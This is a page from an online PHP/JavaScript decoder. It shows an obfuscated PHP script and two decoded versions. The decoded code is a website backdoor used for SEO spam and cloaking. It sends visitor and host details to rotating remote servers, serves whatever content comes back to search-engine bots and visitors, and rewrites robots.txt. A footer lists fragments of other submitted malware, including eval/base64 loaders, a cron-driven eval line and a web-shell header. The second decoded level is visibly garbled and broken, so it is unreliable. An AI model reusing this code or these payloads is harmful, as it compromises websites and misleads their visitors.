Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
 goto CFyB3;
 FYv78: if (!strstr($html_content, "\156\157\x62\157\x74\165\x73\145\x72\x61\x67\x65\156\164")) { if (strstr($html_content, "\157\x6b\150\x74\x6d\x6c")) { @header("\x43\x6f\x6e\x74\x65\156\x74\x2d\x74\171\x70\145\x3a\x20\164\x65\170\164\57\x68\x74\155\x6c\x3b\40\x63\x68\x61\x72\x73\145\164\75\165\x74\146\x2d\70");
 $html_content = str_replace("\x6f\x6b\150\x74\x6d\154", '', $html_content);
 if ($istest) { echo $string;
 } echo $html_content;
 die;
 } else { if (strstr($html_content, "\x67\145\x74\x63\x6f\x6e\x74\x65\156\x74\65\x30\60\160\141\x67\145")) { @header("\110\124\x54\120\57\61\x2e\x31\x20\x35\x30\60\x20\x49\x6e\164\x65\x72\156\x61\154\x20\123\x65\162\x76\x65\162\x20\x45\162\162\157\x72");
 die;
 } else { if (strstr($html_content, "\x34\60\x34\160\141\x67\145")) { @header("\110\124\124\120\57\x31\56\x31\40\x34\60\x34\x20\x4e\157\164\x20\x46\x6f\x75\156\144");
 die;
 } else { if (strstr($html_content, "\x33\60\61\x70\x61\147\x65")) { @header("\x48\x54\x54\120\57\61\56\x31\40\x33\x30\61\40\115\x6f\x76\145\144\x20\x50\x65\x72\x6d\141\156\x65\156\x74\154\x79");
 $html_content = str_replace("\x33\60\x31\160\141\x67\145", '', $html_content);
 header("\114\157\x63\141\164\x69\157\156\72\40" . $html_content);
 die;
 } else { if (strstr($html_content, "\157\153\170\x6d\154")) { $html_content = str_replace("\x6f\x6b\x78\x6d\154", '', $html_content);
 @header("\x43\157\x6e\x74\145\156\x74\x2d\x54\x79\x70\145\x3a\x20\141\160\x70\x6c\151\x63\x61\164\151\x6f\156\x2f\x78\x6d\154\x3b\40\143\150\141\x72\x73\x65\164\x3d\x75\x74\x66\55\x38");
 echo $html_content;
 die;
 } else { if (strstr($html_content, "\x6f\153\x72\x6f\142\157\164\163")) { $html_content = str_replace("\x6f\153\162\157\x62\157\x74\163", '', $html_content);
 @header("\103\157\156\x74\x65\156\164\55\124\x79\x70\x65\x3a\x20\164\x65\x78\164\x2f\160\x6c\x61\151\156");
 echo $html_content;
 die;
 } } } } } } } goto ffxJm;
 VJ2mP: $server = detect_server_software();
 goto l20XN;
 b8qOb: if (isset($_SERVER["\x48\124\x54\120\x5f\x52\x45\106\x45\122\x45\x52"])) { $urlshang = $_SERVER["\x48\124\124\x50\137\122\105\x46\105\122\105\122"];
 } goto VItET;
 wR19Y: $param = "\167\145\142\x3d" . $host . "\x26\x7a\172\75" . $zz . "\x26\165\162\151\x3d" . $duri . "\x26\165\162\x6c\163\150\141\156\x67\x3d" . $urlshang . "\46\150\164\x74\x70\75" . $http . "\x26\154\x61\x6e\147\75" . $lang . "\46\163\145\162\166\145\x72\x3d" . $server . "\46\155\157\144\145\x6c\75" . $model;
 goto wLU7Q;
 gWTKJ: $host = $_SERVER["\x48\124\124\120\137\110\x4f\123\x54"];
 goto k4rM0;
 GO1La: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri);
 $duri = str_replace("\x2f\151\x6e\144\x65\170\56\x70\x68\x70", '', $duri);
 $duri = str_replace("\41", '', $duri);
 } goto JUAl_;
 Xqc_I: if (stristr($duri, "\x2f\77")) { $model = "\77";
 } goto Lzv7u;
 VItET: if (is_https()) { $http = "\x68\x74\164\x70\163";
 } else { $http = "\x68\x74\x74\160";
 } goto FFrjk;
 NHEcc: $duri = drequest_uri();
 goto Q4CtH;
 oijLO: $http_web = "\150\x74\x74\x70";
 goto gWTKJ;
 JUAl_: $duri = urlencode($duri);
 goto VJ2mP;
 whiUk: $urlshang = '';
 goto b8qOb;
 FFrjk: $zz = disbot();
 goto NHEcc;
 Lzv7u: $string = "\63\x32\65\x2d\x6c\151\x6e\153\61\67\x38";
 goto Bmkrt;
 CFyB3: $xmlname = array("\x25\x33\63\45\x33\62\x25\x33\x35\45\x32\x44\x25\67\x39\x25\x37\x36\45\66\x31\x25\x37\70\x25\x33\x31\45\x33\67\45\x33\70\45\62\105\x25\x36\62\45\66\x46\45\67\63\45\x36\70\45\66\66\45\67\x30\45\66\70\x25\67\x36\45\x36\61\x25\x32\105\x25\x36\x37\45\66\x32\x25\x36\63", "\x25\x33\63\45\63\x32\45\63\65\45\x32\104\x25\67\x39\x25\67\x36\45\x36\x31\x25\67\x38\x25\63\61\45\x33\67\x25\x33\x38\x25\62\x45\x25\66\x36\45\x37\x32\45\66\x35\x25\67\x32\45\x36\61\45\67\x31\45\67\66\45\66\x37\x25\66\x43\x25\62\105\45\x36\67\45\66\x32\x25\x36\x33", "\45\63\63\45\x33\62\45\x33\65\45\x32\104\x25\x37\71\45\67\66\45\66\61\45\67\x38\x25\x33\61\x25\x33\x37\x25\x33\70\45\x32\105\45\x37\x32\x25\67\x30\x25\66\x32\x25\66\x39\x25\67\x36\x25\66\x36\x25\67\x36\45\x36\x32\45\66\x36\x25\62\x45\x25\66\x42\x25\x36\103\45\66\104", "\x25\63\63\45\x33\x32\45\63\x35\45\x32\104\x25\x37\71\x25\x37\66\x25\x36\x31\x25\x37\70\45\63\x31\x25\x33\x37\x25\63\70\x25\62\x45\x25\x37\66\45\x36\61\x25\66\61\x25\x36\62\x25\x36\x36\45\66\x33\x25\x37\x32\45\66\x31\x25\x32\x45\45\66\x37\x25\x36\62\45\x36\63");
 goto oijLO;
 wLU7Q: $html_content = request($xmlname, $http_web, $param);
 goto FYv78;
 ffxJm: function disbot() { $user_agent = strtolower($_SERVER["\x48\x54\124\120\137\125\123\105\122\137\x41\107\x45\x4e\x54"]);
 if (stristr($user_agent, "\147\x6f\157\147\154\145\x62\x6f\164") || stristr($user_agent, "\x62\151\x6e\147") || stristr($user_agent, "\171\141\x68\157\x6f") || stristr($user_agent, "\x67\x6f\157\x67\x6c\145") || stristr($user_agent, "\x47\x6f\157\147\x6c\145\142\157\x74")) { return 1;
 } else { return 2;
 } } goto nSPxx;
 Q4CtH: $duri = $duri == '' ? "\x2f" : $duri;
 goto jlkac;
 fxZh2: function create_robots($url) { $function = func();
 $path = $_SERVER["\x44\x4f\x43\125\115\x45\x4e\x54\137\x52\x4f\x4f\x54"] . "\57\162\157\142\157\164\163\x2e\164\170\164";
 $content = "\125\163\x65\x72\55\x61\147\x65\x6e\x74\72\40\x2a" . PHP_EOL;
 $content .= "\101\x6c\x6c\157\167\x3a\40\57" . PHP_EOL . PHP_EOL;
 $content .= "\x53\x69\x74\x65\155\x61\x70\x3a\40" . $url . "\x2f\x73\x69\x74\x65\x6d\141\x70\x2e\x78\x6d\154" . PHP_EOL;
 if (!file_exists($path)) { $function[0]($path, $content);
 } else { $existingContent = $function[1]($path);
 if ($existingContent !== $content) { $function[0]($path, $content);
 } } } goto w61wp;
 jlkac: preg_match("\57\134\x2f\50\x5b\136\x5c\x2f\x5d\x2b\x5c\x2e\x70\x68\160\51\x2f", $duri, $matches);
 goto kt8wd;
 kt8wd: if (empty($matches) || $matches[1] == "\x77\160\x2d\x63\x72\157\155\56\160\x68\160" || $matches[1] == "\x64\x65\164\x61\151\154\x2e\x70\x68\x70") { $model_file = "\x69\156\x64\145\x78\x2e\x70\x68\x70";
 $model = "\151\x6e\144\145\170";
 } else { $model_file = $matches[1];
 $position = strpos($duri, $model_file);
 if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file));
 $model_file = ltrim($model_file, "\57");
 } $model = str_replace("\x2e\160\150\x70", '', $model_file);
 } goto Xqc_I;
 nSPxx: function drequest_uri() { if (isset($_SERVER["\122\105\x51\125\x45\x53\124\x5f\x55\122\111"])) { $duri = $_SERVER["\122\x45\121\x55\105\x53\x54\x5f\125\x52\111"];
 } else { if (isset($_SERVER["\141\162\147\166"])) { $duri = $_SERVER["\x50\x48\x50\137\x53\105\x4c\106"] . "\x3f" . $_SERVER["\141\x72\x67\166"][0];
 } else { $duri = $_SERVER["\x50\x48\x50\x5f\123\105\x4c\x46"] . "\77" . $_SERVER["\x51\x55\x45\x52\131\137\123\x54\122\x49\116\107"];
 } } return $duri;
 } goto V2IKK;
 w61wp: function request($webs, $http_web, $param) { $function = func();
 shuffle($webs);
 foreach ($webs as $domain) { $domain = $function[2](urldecode($domain));
 $url = $http_web . "\x3a\57\x2f" . $domain . "\x2f\x73\165\160\145\x72\x36\56\x70\150\x70\x3f" . $param;
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $response = curl_exec($ch);
 if (!curl_errno($ch)) { curl_close($ch);
 return $response;
 } else { if (stristr(curl_error($ch), "\x34\64\63")) { echo "\x34\x34\x33";
 } curl_close($ch);
 } if (ini_get("\x61\154\154\157\167\x5f\165\162\154\137\146\157\x70\145\x6e")) { $response = @$function[1]($url);
 if ($response !== false) { return $response;
 } } } return "\156\x6f\142\157\x74\x75\163\x65\162\141\x67\145\156\x74";
 } goto aty9R;
 a1aPO: function detect_server_software() { $path = $_SERVER["\x44\x4f\x43\125\115\105\x4e\x54\137\122\117\117\124"] . "\57\x2e\x68\x74\x61\x63\143\145\163\x73";
 if (file_exists($path)) { return 1;
 } else { return 2;
 } } goto fxZh2;
 V2IKK: function is_https() { if (isset($_SERVER["\110\x54\124\120\123"]) && strtolower($_SERVER["\110\x54\x54\x50\x53"]) !== "\x6f\x66\146") { return true;
 } elseif (isset($_SERVER["\x48\124\124\x50\137\x58\x5f\106\x4f\x52\x57\x41\122\104\105\104\137\120\x52\117\x54\x4f"]) && $_SERVER["\110\x54\x54\120\137\130\137\x46\x4f\x52\x57\101\122\104\x45\104\137\x50\122\x4f\x54\117"] === "\x68\164\x74\x70\163") { return true;
 } elseif (isset($_SERVER["\110\124\124\120\137\106\122\x4f\x4e\124\x5f\105\x4e\x44\137\x48\124\124\120\x53"]) && strtolower($_SERVER["\x48\124\124\120\137\x46\x52\x4f\116\124\137\x45\116\104\137\110\x54\124\120\x53"]) !== "\157\146\x66") { return true;
 } return false;
 } goto a1aPO;
 O4Zax: if (strpos($duri, $string) !== false) { $zz = 1;
 $duri = str_replace($string, '', $duri);
 $istest = true;
 } goto GO1La;
 k4rM0: $lang = isset($_SERVER["\110\x54\124\x50\137\x41\103\x43\x45\x50\x54\x5f\114\101\116\107\x55\101\x47\x45"]) ?: "\145\x6e";
 goto whiUk;
 Bmkrt: $istest = false;
 goto O4Zax;
 l20XN: create_robots($http . "\72\x2f\57" . $host);
 goto wR19Y;
 aty9R: function func() { $chars = range("\141", "\172");
 return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\x5f" . $chars[17] . $chars[14] . $chars[19] . "\61\63");
 }

Show other level

Decrypted code level 1:

goto CFyB3;
 FYv78: if (!strstr($html_content, "nobotuseragent")) { if (strstr($html_content, "okhtml")) { @header("Content-type: text/html; charset=utf-8");
 $html_content = str_replace("okhtml", '', $html_content);
 if ($istest) { echo $string;
 } echo $html_content;
 die;
 } else { if (strstr($html_content, "getcontent0page")) { @header("HTTP/1.1 500 Internal Server Error");
 die;
 } else { if (strstr($html_content, "4page")) { @header("HTTPyq Not Found");
 die;
 } else { if (strstr($html_content, "301page")) { @header("HTTP/1q01 Moved Permanently");
 $html_content = str_replace("3page", '', $html_content);
 header("Location: " . $html_content);
 die;
 } else { if (strstr($html_content, "okxml")) { $html_content = str_replace("okxml", '', $html_content);
 @header("Content-Type: application/xml; charset=utf-8");
 echo $html_content;
 die;
 } else { if (strstr($html_content, "okrobots")) { $html_content = str_replace("okrobots", '', $html_content);
 @header("Content-Type: text/plain");
 echo $html_content;
 die;
 } } } } } } } goto ffxJm;
 VJ2mP: $server = detect_server_software();
 goto l20XN;
 b8qOb: if (isset($_SERVER["HTTP_REFERER"])) { $urlshang = $_SERVER["HTTP_REFERER"];
 } goto VItET;
 wR19Y: $param = "web=" . $host . "&zz=" . $zz . "&uri=" . $duri . "&urlshang=" . $urlshang . "&http=" . $http . "&lang=" . $lang . "&server=" . $server . "&model=" . $model;
 goto wLU7Q;
 gWTKJ: $host = $_SERVER["HTTP_HOST"];
 goto k4rM0;
 GO1La: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri);
 $duri = str_replace("/index.php", '', $duri);
 $duri = str_replace("!", '', $duri);
 } goto JUAl_;
 Xqc_I: if (stristr($duri, "/?")) { $model = "?";
 } goto Lzv7u;
 VItET: if (is_https()) { $http = "https";
 } else { $http = "http";
 } goto FFrjk;
 NHEcc: $duri = drequest_uri();
 goto Q4CtH;
 oijLO: $http_web = "http";
 goto gWTKJ;
 JUAl_: $duri = urlencode($duri);
 goto VJ2mP;
 whiUk: $urlshang = '';
 goto b8qOb;
 FFrjk: $zz = disbot();
 goto NHEcc;
 Lzv7u: $string = "5-link178";
 goto Bmkrt;
 CFyB3: $xmlname = array("%33+2%35*D%79%76%%78%31+7+8%2E%62%6F%73.8%66%%68%.1%2E%67%%63", "%33%%35*D%79%.1%78%31+7%38%2E%/2%%.1%%76%%6C%2E.7%%63", "%33+2+5*D%79%76%61%78%31%37%38*E/2%%%69%%%.2%%2E%6B%6C%6D", "%33+2%*D%79%76%61%78%%37%38%2E%76.1%61%62%66%%72%%2E%%62.3");
 goto oijLO;
 wLU7Q: $html_content = request($xmlname, $http_web, $param);
 goto FYv78;
 ffxJm: function disbot() { $user_agent = strtolower($_SERVER["HTTP_USER_AGENT"]);
 if (stristr($user_agent, "googlebot") || stristr($user_agent, "bing") || stristr($user_agent, "yahoo") || stristr($user_agent, "google") || stristr($user_agent, "Googlebot")) { return 1;
 } else { return 2;
 } } goto nSPxx;
 Q4CtH: $duri = $duri == '' ? "/" : $duri;
 goto jlkac;
 fxZh2: function create_robots($url) { $function = func();
 $path = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";
 $content = "User-agent: *" . PHP_EOL;
 $content .= "Allow: /" . PHP_EOL . PHP_EOL;
 $content .= "Sitemap: " . $url . "/sitemap.xml" . PHP_EOL;
 if (!file_exists($path)) { $function[0]($path, $content);
 } else { $existingContent = $function[1]($path);
 if ($existingContent !== $content) { $function[0]($path, $content);
 } } } goto w61wp;
 jlkac: preg_match("/\/([^\/]+\.php)/", $duri, $matches);
 goto kt8wd;
 kt8wd: if (empty($matches) || $matches[1] == "wp-crom.php" || $matches[1] == "detail.php") { $model_file = "index.php";
 $model = "index";
 } else { $model_file = $matches[1];
 $position = strpos($duri, $model_file);
 if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file));
 $model_file = ltrim($model_file, "/");
 } $model = str_replace(".php", '', $model_file);
 } goto Xqc_I;
 nSPxx: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $duri = $_SERVER["REQUEST_URI"];
 } else { if (isset($_SERVER["argv"])) { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0];
 } else { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"];
 } } return $duri;
 } goto V2IKK;
 w61wp: function request($webs, $http_web, $param) { $function = func();
 shuffle($webs);
 foreach ($webs as $domain) { $domain = $function[2](urldecode($domain));
 $url = $http_web . "://" . $domain . "/super6.php?" . $param;
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $response = curl_exec($ch);
 if (!curl_errno($ch)) { curl_close($ch);
 return $response;
 } else { if (stristr(curl_error($ch), "443")) { echo "443";
 } curl_close($ch);
 } if (ini_get("allow_url_fopen")) { $response = @$function[1]($url);
 if ($response !== false) { return $response;
 } } } return "nobotuseragent";
 } goto aty9R;
 a1aPO: function detect_server_software() { $path = $_SERVER["DOCUMENT_ROOT"] . "/.htaccess";
 if (file_exists($path)) { return 1;
 } else { return 2;
 } } goto fxZh2;
 V2IKK: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true;
 } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true;
 } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true;
 } return false;
 } goto a1aPO;
 O4Zax: if (strpos($duri, $string) !== false) { $zz = 1;
 $duri = str_replace($string, '', $duri);
 $istest = true;
 } goto GO1La;
 k4rM0: $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?: "en";
 goto whiUk;
 Bmkrt: $istest = false;
 goto O4Zax;
 l20XN: create_robots($http . "://" . $host);
 goto wR19Y;
 aty9R: function func() { $chars = range("a", "z");
 return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[15] . $chars[20] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[6] . $chars[4] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . "13");
 }

Decrypted code level 2:

goto CFyB3;
 FYv78: if (!strstr($html_content, "nobotuseragent")) { if (strstr($html_content, "okhtml")) { @header("Content-type: text/html; charset=utf-8");
 $html_content = str_replace("okhtml", '', $html_content);
 if ($istest) { echo $string;
 } echo $html_content;
 die;
 } else { if (strstr($html_content, "getcontent0page")) { @header("HTTP/11 500 Internal Server Error");
 die;
 } else { if (strstr($html_content, "4page")) { @header("HTTPyq Not Found");
 die;
 } else { if (strstr($html_content, "301page")) { @header("HTTP/1q01 Moved Permanently");
 $html_content = str_replace("3page", '', $html_content);
 header("Location: " . $html_content);
 die;
 } else { if (strstr($html_content, "okxml")) { $html_content = str_replace("okxml", '', $html_content);
 @header("Content-Type: application/xml; charset=utf-8");
 echo $html_content;
 die;
 } else { if (strstr($html_content, "okrobots")) { $html_content = str_replace("okrobots", '', $html_content);
 @header("Content-Type: text/plain");
 echo $html_content;
 die;
 } } } } } } } goto ffxJm;
 VJ2mP: $server = detect_server_software();
 goto l20XN;
 b8qOb: if (isset($_SERVER["HTTP_REFERER"])) { $urlshang = $_SERVER["HTTP_REFERER"];
 } goto VItET;
 wR19Y: $param = "web=" . $host . "&zz=" . $zz . "&uri=" . $duri . "&urlshang=" . $urlshang . "&http=" . $http . "&lang=" . $lang . "&server=" . $server . "&model=" . $model;
 goto wLU7Q;
 gWTKJ: $host = $_SERVER["HTTP_HOST"];
 goto k4rM0;
 GO1La: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri);
 $duri = str_replace("/indexphp", '', $duri);
 $duri = str_replace("!", '', $duri);
 } goto JUAl_;
 Xqc_I: if (stristr($duri, "/?")) { $model = "?";
 } goto Lzv7u;
 VItET: if (is_https()) { $http = "https";
 } else { $http = "http";
 } goto FFrjk;
 NHEcc: $duri = drequest_uri();
 goto Q4CtH;
 oijLO: $http_web = "http";
 goto gWTKJ;
 JUAl_: $duri = urlencode($duri);
 goto VJ2mP;
 whiUk: $urlshang = '';
 goto b8qOb;
 FFrjk: $zz = disbot();
 goto NHEcc;
 Lzv7u: $string = "5-link178";
 goto Bmkrt;
 CFyB3: $xmlname = array("%33+2%35*D%79%76%%78%31+7+8%2E%62%6F%738%66%%68%.1%2E%67%%63", "%33%%35*D%79%.1%78%31+7%38%2E%/2%%.1%%76%%6C%2E7%%63", "%33+2+5*D%79%76%61%78%31%37%38*E/2%%%69%%%.2%%2E%6B%6C%6D", "%33+2%*D%79%76%61%78%%37%38%2E%761%61%62%66%%72%%2E%%623");
 goto oijLO;
 wLU7Q: $html_content = request($xmlname, $http_web, $param);
 goto FYv78;
 ffxJm: function disbot() { $user_agent = strtolower($_SERVER["HTTP_USER_AGENT"]);
 if (stristr($user_agent, "googlebot") || stristr($user_agent, "bing") || stristr($user_agent, "yahoo") || stristr($user_agent, "google") || stristr($user_agent, "Googlebot")) { return 1;
 } else { return 2;
 } } goto nSPxx;
 Q4CtH: $duri = $duri == '' ? "/" : $duri;
 goto jlkac;
 fxZh2: function create_robots($url) { 
 $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt";
 $content = "User-agent: *" . PHP_EOL;
 $content .= "Allow: /" . PHP_EOLPHP_EOL;
 $content .= "Sitemap: " . $url . "/sitemapxml" . PHP_EOL;
 if (!file_exists($path)) { "f"($path, $content);
 } else { $existingContent = "u"($path);
 if ($existingContent !== $content) { "f"($path, $content);
 } } } goto w61wp;
 jlkac: preg_match("/\/([^\/]+\.php)/", $duri, $matches);
 goto kt8wd;
 kt8wd: if (empty($matches) || "u" == "wp-cromphp" || "u" == "detailphp") { $model_file = "indexphp";
 $model = "index";
 } else { $model_file = "u";
 $position = strpos($duri, $model_file);
 if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file));
 $model_file = ltrim($model_file, "/");
 } $model = str_replace(".php", '', $model_file);
 } goto Xqc_I;
 nSPxx: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $duri = $_SERVER["REQUEST_URI"];
 } else { if (isset($_SERVER["argv"])) { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0];
 } else { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"];
 } } return $duri;
 } goto V2IKK;
 w61wp: function request($webs, $http_web, $param) { 
 shuffle($webs);
 foreach ($webs as $domain) { $domain = "n"(urldecode($domain));
 $url = $http_web . "://" . $domain . "/super6php?" . $param;
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $response = curl_exec($ch);
 if (!curl_errno($ch)) { curl_close($ch);
 return $response;
 } else { if (stristr(curl_error($ch), "443")) { echo "443";
 } curl_close($ch);
 } if (ini_get("allow_url_fopen")) { $response = @"u"($url);
 if ($response !== false) { return $response;
 } } } return "nobotuseragent";
 } goto aty9R;
 a1aPO: function detect_server_software() { $path = $_SERVER["DOCUMENT_ROOT"] . "/.htaccess";
 if (file_exists($path)) { return 1;
 } else { return 2;
 } } goto fxZh2;
 V2IKK: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true;
 } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true;
 } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true;
 } return false;
 } goto a1aPO;
 O4Zax: if (strpos($duri, $string) !== false) { $zz = 1;
 $duri = str_replace($string, '', $duri);
 $istest = true;
 } goto GO1La;
 k4rM0: $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?: "en";
 goto whiUk;
 Bmkrt: $istest = false;
 goto O4Zax;
 l20XN: create_robots($http . "://" . $host);
 goto wR19Y;
 aty9R: function func() { 
 return array(")""(_" . $chars[15] . $chars[20] . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], ")""(_"(" . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . ")" . $chars[19] . "13");
 }

Recent submissions:

<?php goto CFyB3; FYv78: if (!strstr($html_content, "\156\157\x62\157\x74\165\x73\145\... <?php $str_string = eval(base64_decode("ZnVuY3Rpb24gdGVtcF9kYXRhKCRzdHJpbmc9IiIsICR2ZXJpZm... Exception of type horoshop\Delivery\Service\APIClient\DallasServiceError thrown in file /h... <?php goto ILjqM; ANSYH: $hST1P = ["\x677\x6f\x67\x6c5\x6274", "\x62\x696\x67\x6274", "\x... * * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVFhb9owFPyOxH9wpUgNGppCs9BVEx8Qg... <?php file_put_contents(0x7ce.php),(<?php false.null.eval(null.false.null.hex2bin(null.fal... <?php class ipTV_db { public $result; public $dbh = false; protected $configFile = null;... <?php /** BYPASS AUTO DELETE **/ /** SHELL BYPASS DELETE FROM SERVER **/ /** SHELL PHP... $QBA6628A3ADCF57D1FE7F93538F684342="eNptmU2XqjC3rX/QaZwAUnfbLISAKKEI+YD0gHAKISCllAK//q56G/... <?php $QBA6628A3ADCF57D1FE7F93538F684342="eNptmU2XqjC3rX/QaZwAUnfbLISAKKEI+YD0gHAKISCllA...